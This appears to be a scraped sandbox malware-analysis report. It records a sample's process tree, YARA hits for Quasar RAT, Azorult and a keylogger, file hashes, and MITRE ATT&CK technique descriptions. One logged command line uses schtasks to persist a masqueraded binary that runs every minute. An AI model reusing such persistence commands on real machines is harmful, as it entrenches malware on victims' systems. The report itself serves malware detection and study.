Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: windef.exe PID: 5848 Parent PID: 7128

General

Start time:	01:36:04
Start date:	29/09/2021
Path:	C:\Users\user\AppData\Local\Temp\windef.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\windef.exe'
Imagebase:	0xf10000
File size:	357376 bytes
MD5 hash:	B4A202E03D4135484D0E730173ABCC72
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, Author: Joe Security Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 86%, Virustotal, Browse Detection: 93%, ReversingLabs
Reputation:	moderate

Analysis Process: CVbJSUXraQ.exe PID: 4112 Parent PID: 7128

General

Start time:	01:36:05
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\CVbJSUXraQ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\CVbJSUXraQ.exe
Imagebase:	0xdb0000
File size:	2111264 bytes
MD5 hash:	B0B78DA613422BE0DE8DE2E2A2D0CE68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: schtasks.exe PID: 6836 Parent PID: 7128

General

Start time:	01:36:06
Start date:	29/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Imagebase:	0x2d0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6084 Parent PID: 6836

General

Start time:	01:36:07
Start date:	29/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: SystemPropertiesPerformance.exe PID: 6424 Parent PID: 968

General

Start time:	01:36:08
Start date:	29/09/2021
Path:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Imagebase:	0xa40000
File size:	2111272 bytes
MD5 hash:	9423821A023FB02427783F6385871B3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report CVbJSUXraQ

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
